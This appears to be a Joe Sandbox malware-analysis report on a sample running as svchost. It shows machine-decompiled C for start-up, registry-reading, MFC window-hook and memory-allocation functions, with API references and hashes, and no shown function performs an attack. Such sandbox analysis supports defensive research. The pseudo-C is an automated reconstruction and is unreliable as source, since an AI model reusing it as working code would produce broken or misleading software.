    				signed int _t185;
    				intOrPtr _t186;
    				intOrPtr _t190;
    				signed int _t191;
    				void* _t194;
    				intOrPtr _t196;
    				signed int _t204;
    				intOrPtr _t209;
    				intOrPtr _t216;
    				signed int _t218;
    				intOrPtr _t225;
    				signed int _t227;
    				intOrPtr _t231;
    				intOrPtr _t241;
    				intOrPtr _t242;
    				intOrPtr _t243;
    				intOrPtr _t244;
    				intOrPtr _t246;
    				struct HINSTANCE__* _t252;
    				intOrPtr _t254;
    				void* _t256;
    				intOrPtr _t258;
    				signed int _t262;
    				char* _t265;
    				void* _t268;
    				intOrPtr _t269;
    				void* _t270;
    				CHAR** _t273;
    				void* _t278;
    				void* _t279;
    				void* _t280;
    				void* _t281;
    				void* _t283;
    				void* _t284;
    				void* _t285;
    				struct HINSTANCE__** _t286;
    				signed int _t287;
    				signed int _t289;
    				intOrPtr _t292;
    				intOrPtr _t293;
    				void* _t294;
    				void* _t295;
    				intOrPtr _t315;
    
    				_push(0xffffffff);
    				_push(E00490233);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t292;
    				_t293 = _t292 - 0x1ac;
    				_t190 = __ecx;
    				_v20 = _t293;
    				_v24 = __ecx;
    				 *((intOrPtr*)(_t190 + 0x40c)) = GetProcessHeap();
    				_t119 =  *0x4926f0; // 0x3
    				 *((intOrPtr*)(_t190 + 0xc4)) = _t119;
    				_t196 =  *0x4926f4; // 0x0
    				 *((intOrPtr*)(_t190 + 0xc8)) = _t196;
    				_t246 =  *0x4926f8; // 0x1082d
    				 *((intOrPtr*)(_t190 + 0xcc)) = _t246 + 1;
    				if( *((intOrPtr*)(_t190 + 0x404)) == 0) {
    					 *0x4926e8(0); // executed
    					 *((intOrPtr*)(_t190 + 0x404)) = 1;
    				}
    				GetModuleFileNameA(0,  &_v444, 0x104);
    				_t265 = E00471D67( &_v444,  &_v444, 0x5c);
    				_t294 = _t293 + 8;
    				if(_t265 == 0) {
    					_t273 = _t190 + 0xd0;
    					E0048324D(_t273, _t273);
    					_push( &_v444);
    				} else {
    					_t273 = _t190 + 0xd0;
    					 *_t265 = 0;
    					E004833FF(_t273,  &_v444);
    					_push(_t265 + 1);
    				}
    				E004833FF(_t190 + 0xd4);
    				SetCurrentDirectoryA( *_t273); // executed
    				E00429EF0(_t190 + 0x370, E00401000, E00401000, 0x401002);
    				E00429EF0(_t190 + 0x384, E00401000, E00401000, 0x401002);
    				E00429EF0(_t190 + 0x3b8, E00401000, E00401000, 0x401002);
    				_t131 = LoadCursorA(0, 0x7f00);
    				_t133 = E0041FD80("_EL_HideOwner", 0, _t131, GetStockObject(5), 0);
    				_t295 = _t294 + 0x14;
    				E004851E0(_t190 + 0x3c8, 0x80, _t133, 0x4c9e6c, 0, 0, 0, 0, 0, 0, 0, 0); // executed
    				 *((intOrPtr*)(_t190 + 0x228)) = GetCurrentThreadId();
    				_t136 =  *0x492704; // 0x687
    				if(_t136 > 0) {
    					_t244 =  *0x492700; // 0x493f90
    					 *((intOrPtr*)(_t190 + 0x198)) = _t244;
    					_t262 =  *0x492704; // 0x687
    					_t186 =  *0x492700; // 0x493f90
    					_t136 = _t186 + _t262;
    					 *(_t190 + 0x19c) = _t136;
    				}
    				_t191 =  *0x492718; // 0x2b
    				if(_t191 <= 0) {
    					L18:
    					_t204 =  *0x492710; // 0x6
    					if(_t204 <= 0) {
    						L25:
    						_t315 =  *0x49270c; // 0x4
    						if(_t315 <= 0) {
    							L43:
    							 *[fs:0x0] = _v16;
    							return _t136;
    						}
    						E0040B5D0( &_v60);
    						_v68 = 0x497860;
    						_v64 = _v24;
    						_v8 = 0;
    						E00483854( &_v76);
    						_v8 = 2;
    						E0048A965( &_v116, _t315, 0x400);
    						_t140 =  *0x49270c; // 0x4
    						_t209 =  *0x492708; // 0x494618
    						_v8 = 3;
    						E0048A9B1( &_v116, _t209, _t140, 0);
    						_push(0);
    						_push(0x1000);
    						_push(1);
    						_push( &_v116);
    						E0048A146( &_v184);
    						_push( &_v184);
    						_v8 = 4;
    						E00414650();
    						E0048A2AA( &_v184, _t315);
    						_v8 = 3;
    						E0048A222( &_v184);
    						_v8 = 2;
    						E0048A9EE( &_v116);
    						_v8 = 0;
    						E00483892();
    						_t216 =  *0x4926fc; // 0x401004
    						_t149 = _v44;
    						_v36 = _t216;
    						_t218 = _t149 >> 3;
    						asm("sbb eax, eax");
    						_t152 = ( ~_t149 & _v52) + _t218 * 4;
    						if(_t218 <= 0) {
    							L41:
    							E00413C10(_v24 + 0x104,  &_v68);
    							E0040B7D0( &_v60);
    							_v68 = 0x497860;
    							_v8 = 8;
    							E00414590();
    							_v68 = 0x497854;
    							_v8 = 9;
    							E0040B7D0( &_v60);
    							_v8 = 0xffffffff;
    							_v60 = 0x497850;
    							_t136 = E0040B7D0( &_v60);
    							goto L43;
    						}
    						_v40 = _t152;
    						_v32 = _t218;
    						do {
    							_t158 =  *_t152;
    							_t194 = 0;
    							_t225 =  *((intOrPtr*)(_t158 + 0x18));
    							_v28 = _t225;
    							if(_t225 <= 0) {
    								goto L40;
    							}
    							_t268 = _t158 + 0x14;
    							do {
    								_t160 = E004135B0(_t268, _t194, 0);
    								_t229 = _t268;
    								_t278 = _t160;
    								if(E00413C90(_t268, _t194) != 1) {
    									_t279 = _t278 + 0x18;
    									_t280 = _t279 + E0040C020(_t229, _t279);
    									_t163 = E0040C020(_t229, _t280);
    									_t85 = _t163 + 0x1c; // 0x4
    									_t281 =  *((intOrPtr*)(_t280 + _t85 + 4 +  *(_t280 + _t163 + 0x1c) * 4)) + _t280 + _t85 + 4 +  *(_t280 + _t163 + 0x1c) * 4 + 4;
    									_t166 = E0040C020( *(_t280 + _t163 + 0x1c), _t281);
    									_t231 =  *((intOrPtr*)(_t166 + _t281 + 0xc));
    									_t295 = _t295 + 0xc;
    									_t168 = _t166 + _t281 + 0xc + 8;
    									__eflags = _t231;
    									if(_t231 <= 0) {
    										goto L39;
    									} else {
    										goto L35;
    									}
    									do {
    										L35:
    										_t252 =  *_t168;
    										__eflags = _t252 - 0xffffffff;
    										if(_t252 == 0xffffffff) {
    											 *_t168 = 0;
    										} else {
    											 *_t168 = _t252 + _v36;
    										}
    										_t168 =  &(_t168[2]);
    										_t231 = _t231 - 1;
    										__eflags = _t231;
    									} while (_t231 != 0);
    									goto L39;
    								}
    								_t283 = _t278 + 0x18;
    								_t284 = _t283 + E0040C020(_t229, _t283);
    								_t285 = _t284 + E0040C020(_t229, _t284) + 0xc;
    								_t286 = _t285 + E0040C020(_t229, _t285);
    								_t295 = _t295 + 0xc;
    								_t173 =  *_t286;
    								if(_t173 == 0xffffffff) {
    									 *_t286 = 0;
    								} else {
    									 *_t286 = _t173 + _v36;
    								}
    								L39:
    								_t194 = _t194 + 1;
    							} while (_t194 < _v28);
    							L40:
    							_t152 = _v40 + 4;
    							_t227 = _v32 - 1;
    							_v40 = _t152;
    							_v32 = _t227;
    						} while (_t227 != 0);
    						goto L41;
    					}
    					_t287 = 0;
    					if(_t204 <= 0) {
    						L24:
    						_t254 =  *0x492714; // 0x492c60
    						_push(_t204 << 2);
    						E0040BD00(_v24 + 0x120, _t254);
    						_t176 =  *0x492710; // 0x6
    						_push(_t176 * 4);
    						_t136 = E0040BD00(_v24 + 0x134, 0);
    						goto L25;
    					} else {
    						goto L20;
    					}
    					do {
    						L20:
    						_t177 =  *0x492714; // 0x492c60
    						_t178 =  *((intOrPtr*)(_t177 + _t287 * 4));
    						if(_t178 != 0) {
    							_t43 = _t178 + 0x78; // 0x418a90
    							_t179 =  *_t43;
    							if(_t179 != 0) {
    								 *_t179(1, E00418A70, 0);
    								_t204 =  *0x492710; // 0x6
    							}
    						}
    						_t287 = _t287 + 1;
    					} while (_t287 < _t204);
    					goto L24;
    				} else {
    					_t269 = _v24;
    					_t289 = _t191 * 4;
    					_push(_t289);
    					E0040BD00(_t269 + 0x170, 0);
    					_push(_t289);
    					E0040BD00(_t269 + 0x184, 0);
    					_t270 = _t269 + 0x148;
    					_push(_t289);
    					E0040BD00(_t270, 0);
    					_push(_t289);
    					E0040BD00(_v24 + 0x15c, 0);
    					_t185 = 0;
    					if(_t191 <= 0) {
    						L13:
    						_t136 = 0;
    						if(_t191 <= 0) {
    							goto L18;
    						} else {
    							goto L14;
    						}
    						do {
    							L14:
    							_t241 =  *0x492720; // 0x4927d0
    							_t242 =  *((intOrPtr*)(_t241 + _t136 * 4));
    							if(_t136 >= 0) {
    								_t256 = _v24 + 0x15c;
    								if(_t136 <  *(_t256 + 0x10) >> 2) {
    									 *((intOrPtr*)( *((intOrPtr*)(_t256 + 8)) + _t136 * 4)) = _t242;
    								}
    							}
    							_t136 = _t136 + 1;
    						} while (_t136 < _t191);
    						goto L18;
    					} else {
    						goto L9;
    					}
    					do {
    						L9:
    						_t258 =  *0x49271c; // 0x492724
    						_t243 =  *((intOrPtr*)(_t258 + _t185 * 4));
    						if(_t185 >= 0 && _t185 <  *(_t270 + 0x10) >> 2) {
    							 *((intOrPtr*)( *((intOrPtr*)(_t270 + 8)) + _t185 * 4)) = _t243;
    						}
    						_t185 = _t185 + 1;
    					} while (_t185 < _t191);
    					goto L13;
    				}
    			}

    APIs
    • GetProcessHeap.KERNEL32 ref: 0043C419
    • OleInitialize.OLE32(00000000), ref: 0043C455
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0043C473
    • SetCurrentDirectoryA.KERNELBASE(?,?), ref: 0043C4CD
    • LoadCursorA.USER32(00000000,00007F00), ref: 0043C528
    • GetStockObject.GDI32(00000005), ref: 0043C549
    • GetCurrentThreadId.KERNEL32 ref: 0043C571
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Current$CursorDirectoryFileHeapInitializeLoadModuleNameObjectProcessStockThread
    • String ID: $'I$0<A$PFA$_EL_HideOwner$`,I$`xI
    • API String ID: 3783217854-3451745729
    • Opcode ID: 566765c6b1c5a76fbc1fb93bdf602344aaa7354453cf4076cf6c4ae38e5853d1
    • Instruction ID: a5d35e6d2807c6f631299a2b09cd0150896d184c5175dc3ca22c23d1cac2fe03
    • Opcode Fuzzy Hash: 566765c6b1c5a76fbc1fb93bdf602344aaa7354453cf4076cf6c4ae38e5853d1
    • Instruction Fuzzy Hash: 79E1C270A00205ABCB14EF95CC92BEE77B4FF58708F14417EE905B7282DB786A45CB99
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    [Control-flow graph image not recoverable: basic blocks 40aff0 through 40b3a0, with executed and not-executed blocks colour-coded in the original; API calls along the graph: RegOpenKeyExA, RegQueryValueExA, RegCloseKey, ExpandEnvironmentStringsA]
    C-Code - Quality: 93%
    			E0040AFF0() {
    				void* __ebp;
    				intOrPtr _t94;
    				long _t98;
    				CHAR** _t100;
    				CHAR* _t101;
    				void* _t102;
    				intOrPtr _t105;
    				intOrPtr _t107;
    				void* _t108;
    				int _t114;
    				signed int _t115;
    				intOrPtr _t136;
    				void* _t140;
    				intOrPtr* _t155;
    				intOrPtr _t169;
    				intOrPtr _t174;
    				void* _t175;
    				void* _t176;
    
    				_push(0xffffffff);
    				_push(E0048DCE0);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t174;
    				_t175 = _t174 - 0x54;
    				_t94 =  *0x4b8924; // 0x4b8938
    				 *((intOrPtr*)(_t175 + 0x14)) = _t94;
    				_t169 =  *((intOrPtr*)(_t175 + 0x84));
    				 *((intOrPtr*)(_t175 + 0x80)) = 0;
    				E0040AE90(_t169,  *((intOrPtr*)(_t175 + 0x84)), _t175 + 0x28, _t175 + 0x18, _t175 + 0x18, _t169);
    				_t176 = _t175 + 0x14;
    				_t98 = RegOpenKeyExA( *(_t175 + 0x34),  *(_t175 + 0x28), 0, 0x20019, _t176 + 0x10); // executed
    				if(_t98 != 0) {
    					L29:
    					asm("sbb ebp, ebp");
    					_t100 =  *((intOrPtr*)(_t176 + 0x7c)) + ( ~(_t169 - 1) + 3 + ( ~(_t169 - 1) + 3) * 2) * 4;
    					if(_t100[2] != 0) {
    						_t136 =  *((intOrPtr*)(_t176 + 0x80));
    						if(_t136 == 0) {
    							_t101 = E004147A0(_t136,  *_t100);
    							_t176 = _t176 + 4;
    							L42:
    							 *( *(_t176 + 0x74)) = _t101;
    							L43:
    							 *((intOrPtr*)(_t176 + 0x6c)) = 0xffffffff;
    							_t102 = E004832C2(_t176 + 0x14);
    							 *[fs:0x0] =  *((intOrPtr*)(_t176 + 0x64));
    							return _t102;
    						}
    						_t140 = _t136 - 1;
    						if(_t140 == 0) {
    							_t101 =  *_t100;
    							goto L42;
    						}
    						if(_t140 == 1) {
    							_push( *((intOrPtr*)( &(( *_t100)[8]) - 4)));
    							_t105 = E00414830( &(( *_t100)[8]));
    							_t155 =  *((intOrPtr*)(_t176 + 0x7c));
    							_t176 = _t176 + 8;
    							 *_t155 = _t105;
    						}
    						goto L43;
    					}
    					_t107 =  *((intOrPtr*)(_t176 + 0x80));
    					if(_t107 == 0) {
    						 *( *(_t176 + 0x74)) = 0;
    					} else {
    						_t108 = _t107 - 1;
    						if(_t108 == 0) {
    							 *( *(_t176 + 0x74)) = 0;
    						} else {
    							if(_t108 == 1) {
    								 *( *(_t176 + 0x74)) = 0;
    							}
    						}
    					}
    					goto L43;
    				}
    				 *((intOrPtr*)(_t176 + 0x9c)) = 0;
    				if(RegQueryValueExA( *(_t176 + 0x14),  *(_t176 + 0x18), 0, _t176 + 0x1c, 0, _t176 + 0x84) != 0) {
    					L28:
    					RegCloseKey( *(_t176 + 0x10));
    					goto L29;
    				}
    				_t114 =  *(_t176 + 0x1c);
    				if(_t114 != 3) {
    					if(_t114 == 1 || _t114 == 2) {
    						if( *((intOrPtr*)(_t176 + 0x80)) == 0) {
    							goto L10;
    						}
    						goto L8;
    					} else {
    						L8:
    						if(_t114 != 4 ||  *((intOrPtr*)(_t176 + 0x80)) != 1) {
    							goto L28;
    						} else {
    							L10:
    							_t115 = _t114 - 1;
    							if(_t115 > 3) {
    								goto L28;
    							}
    							switch( *((intOrPtr*)(_t115 * 4 +  &M0040B3A4))) {
    								case 0:
    									E0040B5D0(_t176 + 0x28);
    									 *((char*)(_t176 + 0x70)) = 1;
    									_t167 = E0040B5F0(_t176 + 0x28,  *(_t176 + 0x84));
    									if(_t167 == 0 || RegQueryValueExA( *(_t176 + 0x10),  *(_t176 + 0x18), 0, 0, _t167, _t176 + 0x84) != 0) {
    										 *((char*)(_t176 + 0x6c)) = 0;
    										 *(_t176 + 0x28) = 0x494630;
    										_t39 = _t176 + 0x28; // 0x494630
    										_t147 = _t39;
    										goto L27;
    									} else {
    										_t149 =  *(_t176 + 0x10);
    										RegCloseKey( *(_t176 + 0x10));
    										if( *(_t176 + 0x1c) != 1) {
    											_push( *(_t176 + 0x84));
    											_t124 = E00414830(_t167);
    											_t150 =  *((intOrPtr*)(_t176 + 0x7c));
    											_t176 = _t176 + 8;
    											 *_t150 = _t124;
    										} else {
    											_t126 = E004147A0(_t149, _t167);
    											_t161 =  *((intOrPtr*)(_t176 + 0x78));
    											_t176 = _t176 + 4;
    											 *_t161 = _t126;
    										}
    										 *((char*)(_t176 + 0x6c)) = 0;
    										 *(_t176 + 0x28) = 0x494630;
    										E0040B7D0(_t176 + 0x28);
    										goto L43;
    									}
    								case 1:
    									__ecx = __esp + 0x50;
    									E0040B5D0(__esp + 0x50) =  *(__esp + 0x84);
    									__ecx = __esp + 0x50;
    									 *((char*)(__esp + 0x70)) = 2;
    									__edi = E0040B5F0(__esp + 0x50,  *(__esp + 0x84));
    									if(__edi == 0) {
    										L26:
    										 *((char*)(__esp + 0x6c)) = 0;
    										 *(__esp + 0x50) = 0x494630;
    										_t74 = __esp + 0x50; // 0x494630
    										__ecx = _t74;
    										L27:
    										E0040B7D0(_t147);
    										goto L28;
    									}
    									__edx =  *(__esp + 0x18);
    									__eax =  *(__esp + 0x10);
    									__ecx = __esp + 0x84;
    									if(RegQueryValueExA( *(__esp + 0x10),  *(__esp + 0x18), 0, 0, __edi, __esp + 0x84) != 0) {
    										goto L26;
    									}
    									__ecx =  *(__esp + 0x10);
    									__eax = RegCloseKey( *(__esp + 0x10));
    									__eax = ExpandEnvironmentStringsA(__edi, 0, 0);
    									__ecx = __esp + 0x3c;
    									 *(__esp + 0x84) = __eax;
    									__eax = E0040B5D0(__esp + 0x3c);
    									__edx =  *(__esp + 0x84);
    									__ecx = __esp + 0x3c;
    									 *((char*)(__esp + 0x70)) = 3;
    									__esi = E0040B5F0(__ecx,  *(__esp + 0x84));
    									if(__esi == 0) {
    										__ecx = __esp + 0x3c;
    										 *((char*)(__esp + 0x6c)) = 2;
    										 *(__esp + 0x3c) = 0x494630;
    										__eax = E0040B7D0(__esp + 0x3c);
    										goto L26;
    									}
    									 *(__esp + 0x84) = ExpandEnvironmentStringsA(__edi, __esi,  *(__esp + 0x84));
    									__eax = E004147A0(__ecx, __esi);
    									__ecx =  *(__esp + 0x78);
    									__esi = 0x494630;
    									 *((char*)(__esp + 0x6c)) = 2;
    									 *( *(__esp + 0x78)) = __eax;
    									__ecx = __esp + 0x3c;
    									 *(__esp + 0x3c) = 0x494630;
    									__eax = E0040B7D0(__esp + 0x3c);
    									__ecx = __esp + 0x50;
    									 *((char*)(__esp + 0x6c)) = 0;
    									 *(__esp + 0x50) = 0x494630;
    									__eax = E0040B7D0(__ecx);
    									goto L43;
    								case 2:
    									__ecx =  *(__esp + 0x18);
    									__edx = __esp + 0x84;
    									__eax = __esp + 0x24;
    									_push(__esp + 0x84);
    									__edx =  *(__esp + 0x14);
    									_push(__eax);
    									_push(__edi);
    									 *((intOrPtr*)(__esp + 0x9c)) = 4;
    									if(ExpandEnvironmentStringsA(__edx, __ecx, __edi) != 0) {
    										goto L28;
    									}
    									 *(__esp + 0x10) = RegCloseKey( *(__esp + 0x10));
    									__ecx =  *(__esp + 0x74);
    									__edx =  *(__esp + 0x24);
    									 *__ecx =  *(__esp + 0x24);
    									goto L43;
    							}
    						}
    					}
    				}
    				if( *((intOrPtr*)(_t176 + 0x80)) == 2) {
    					goto L10;
    				} else {
    					goto L28;
    				}
    			}

    APIs
    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?), ref: 0040B05A
    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B08E
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?), ref: 0040B125
    • RegCloseKey.ADVAPI32(?), ref: 0040B130
    • RegCloseKey.ADVAPI32(?), ref: 0040B2E6
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CloseQueryValue$Open
• String ID: 0FI$0FI (the plugin reports the immediate 0x494630, which the code above stores into a stack object before calling E0040B7D0, as a string: its little-endian bytes 30 46 49 00 read as "0FI", so this is an address constant, not text from the sample)
    • API String ID: 4082589901-469067051
    • Opcode ID: d686a9f7bbc5a72ce6b93d2d3948ffaa0f29f7b1a3acd313d392d3c6e7d2d24c
    • Instruction ID: 2d293ebde8f4226ba87270bffba67c27645a439f06e906687c37b82c007b6497
    • Opcode Fuzzy Hash: d686a9f7bbc5a72ce6b93d2d3948ffaa0f29f7b1a3acd313d392d3c6e7d2d24c
    • Instruction Fuzzy Hash: 21B168B01083859FC320DF25C894F6BB7E4FBD5708F10492EF595A7291DB789809CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 81%
    			E00484D81(void* __ecx, void* __edx) {
    				_Unknown_base(*)()* _t33;
    				void* _t35;
    				void* _t36;
    				long _t40;
    				void* _t41;
    				void* _t44;
    				long _t54;
    				signed int _t58;
    				void* _t61;
    				void* _t66;
    				struct HWND__* _t68;
    				CHAR* _t71;
    				void* _t74;
    				void* _t75;
    				void* _t77;
    
    				_t66 = __edx;
    				_t61 = __ecx;
    				E00473304(E00490CAC, _t75);
    				_t68 =  *(_t75 + 8);
    				_t71 = "AfxOldWndProc423";
    				 *((intOrPtr*)(_t75 - 0x10)) = _t77 - 0x40;
    				_t33 = GetPropA(_t68, _t71);
    				 *(_t75 - 0x14) =  *(_t75 - 0x14) & 0x00000000;
    				 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
    				 *(_t75 - 0x18) = _t33;
    				_t35 =  *(_t75 + 0xc) - 6;
    				_t58 = 1;
    				if(_t35 == 0) {
    					_t36 = E00484C84(_t75,  *(_t75 + 0x14));
    					E004849E2(_t61, E00484C84(_t75, _t68),  *(_t75 + 0x10), _t36);
    					goto L9;
    				} else {
    					_t41 = _t35 - 0x1a;
    					if(_t41 == 0) {
    						_t58 = 0 | E00484A43(E00484C84(_t75, _t68),  *(_t75 + 0x14),  *(_t75 + 0x14) >> 0x10) == 0x00000000;
    						L9:
    						if(_t58 != 0) {
    							goto L10;
    						}
    					} else {
    						_t44 = _t41 - 0x62;
    						if(_t44 == 0) {
    							SetWindowLongA(_t68, 0xfffffffc,  *(_t75 - 0x18));
    							RemovePropA(_t68, _t71);
    							GlobalDeleteAtom(GlobalFindAtomA(_t71));
    							goto L10;
    						} else {
    							if(_t44 != 0x8e) {
    								L10:
    								_t40 = CallWindowProcA( *(_t75 - 0x18), _t68,  *(_t75 + 0xc),  *(_t75 + 0x10),  *(_t75 + 0x14)); // executed
    								 *(_t75 - 0x14) = _t40;
    							} else {
    								_t74 = E00484C84(_t75, _t68);
    								E00484946(_t74, _t75 - 0x30, _t75 - 0x1c);
    								_t54 = CallWindowProcA( *(_t75 - 0x18), _t68, 0x110,  *(_t75 + 0x10),  *(_t75 + 0x14)); // executed
    								_push( *((intOrPtr*)(_t75 - 0x1c)));
    								 *(_t75 - 0x14) = _t54;
    								_push(_t75 - 0x30);
    								_push(_t74);
    								E00484969(_t66);
    							}
    						}
    					}
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
    				return  *(_t75 - 0x14);
    			}


    APIs
    • __EH_prolog.LIBCMT ref: 00484D86
    • GetPropA.USER32(?,AfxOldWndProc423), ref: 00484D9E
    • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 00484DFC
      • Part of subcall function 00484969: GetWindowRect.USER32(?,?), ref: 0048498E
      • Part of subcall function 00484969: GetWindow.USER32(?,00000004), ref: 004849AB
    • SetWindowLongA.USER32(?,000000FC,?), ref: 00484E2C
    • RemovePropA.USER32(?,AfxOldWndProc423), ref: 00484E34
    • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00484E3B
    • GlobalDeleteAtom.KERNEL32(00000000), ref: 00484E42
      • Part of subcall function 00484946: GetWindowRect.USER32(?,?), ref: 00484952
    • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 00484E96
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
    • String ID: AfxOldWndProc423
    • API String ID: 2397448395-1060338832
    • Opcode ID: f1f1f7d37241c8b45f9e38e3a63ca1d60ef60a121754bac273069352469eff1d
    • Instruction ID: d183b956f1ed9f7f600ba3538b9cb76ba457444dcbdee590b616221e594621f1
    • Opcode Fuzzy Hash: f1f1f7d37241c8b45f9e38e3a63ca1d60ef60a121754bac273069352469eff1d
    • Instruction Fuzzy Hash: 5431627280011ABBDF11AFA5DE49DBF7A7CFF85325F00452BF601A2150D7798910EBA9
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

(Rendered graph omitted; in the report its nodes are shaded Executed / Not Executed.) Basic blocks of E0048C8E0 that call out, as recorded in the graph:
• 48c8e0-48c8fd (entry): RtlEnterCriticalSection
• 48c939-48c94a: GlobalAlloc
• 48c94c-48c968: GlobalHandle, GlobalUnWire, GlobalReAlloc
• 48c97c-48c992: GlobalHandle, GlobalFix, RtlLeaveCriticalSection, call 481443
• 48c997-48c9c4: GlobalFix, call 4733c0
• 48c9d0-48c9f1 (exit): RtlLeaveCriticalSection
    C-Code - Quality: 35%
    			E0048C8E0() {
    				void* __ecx;
    				intOrPtr _t36;
    				void* _t38;
    				void* _t43;
    				signed char* _t58;
    				void* _t61;
    				void* _t63;
    				void* _t65;
    				signed int _t70;
    				void* _t71;
    				intOrPtr _t72;
    				signed int _t73;
    				void* _t74;
    
    				_t71 = _t65;
    				_t1 = _t71 + 0x1c; // 0x4e1438
    				_t36 = _t1;
    				 *((intOrPtr*)(_t74 + 0x14)) = _t36;
    				 *0x49224c(_t36);
    				_t3 = _t71 + 4; // 0x20
    				_t72 =  *_t3;
    				_t4 = _t71 + 8; // 0x4
    				_t70 =  *_t4;
    				if(_t70 >= _t72) {
    					L2:
    					_t70 = 1;
    					if(_t72 <= _t70) {
    						L7:
    						_t13 = _t71 + 0x10; // 0xe05b70
    						_t38 =  *_t13;
    						_t73 = _t72 + 0x20;
    						if(_t38 != 0) {
    							_t61 = GlobalHandle(_t38);
    							GlobalUnWire(_t61);
    							_t43 = GlobalReAlloc(_t61, _t73 << 3, 0x2002);
    						} else {
    							_t43 = GlobalAlloc(0x2002, _t73 << 3); // executed
    						}
    						 *(_t74 + 0x10) = _t43;
    						if(_t43 == 0) {
    							_t15 = _t71 + 0x10; // 0xe05b70
    							GlobalFix(GlobalHandle( *_t15));
    							 *0x492250( *((intOrPtr*)(_t74 + 0x14)));
    							_t43 = E00481443(_t65);
    						}
    						GlobalFix( *(_t74 + 0x10));
    						_t63 = _t43;
    						_t18 = _t71 + 4; // 0x20
    						E004733C0(_t63 +  *_t18 * 8, 0,  *_t18 * 0x1fffffff + _t73 << 3);
    						_t74 = _t74 + 0xc;
    						 *(_t71 + 0x10) = _t63;
    						 *(_t71 + 4) = _t73;
    					} else {
    						_t10 = _t71 + 0x10; // 0xe05b70
    						_t58 =  *_t10 + 8;
    						while(( *_t58 & 0x00000001) != 0) {
    							_t70 = _t70 + 1;
    							_t58 =  &(_t58[8]);
    							if(_t70 < _t72) {
    								continue;
    							}
    							break;
    						}
    						if(_t70 >= _t72) {
    							goto L7;
    						}
    					}
    				} else {
    					_t5 = _t71 + 0x10; // 0xe05b70
    					if(( *( *_t5 + _t70 * 8) & 0x00000001) != 0) {
    						goto L2;
    					}
    				}
    				_t23 = _t71 + 0xc; // 0x4
    				if(_t70 >=  *_t23) {
    					_t24 = _t70 + 1; // 0x5
    					 *((intOrPtr*)(_t71 + 0xc)) = _t24;
    				}
    				_t26 = _t71 + 0x10; // 0xe05b70
    				 *( *_t26 + _t70 * 8) =  *( *_t26 + _t70 * 8) | 0x00000001;
    				_t34 = _t70 + 1; // 0x5
    				 *(_t71 + 8) = _t34;
    				 *0x492250( *(_t74 + 0x10));
    				return _t70;
    			}


    APIs
    • RtlEnterCriticalSection.NTDLL(004E1438), ref: 0048C8EF
    • GlobalAlloc.KERNELBASE(00002002,00000000,?,?,004E141C,004E141C,0048CC7B,00000000,?,00483883,0048BFC8,?,?,00483860,?,0040AB42), ref: 0048C944
    • GlobalHandle.KERNEL32(00E05B70), ref: 0048C94D
    • GlobalUnWire.KERNEL32(00000000), ref: 0048C956
    • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 0048C968
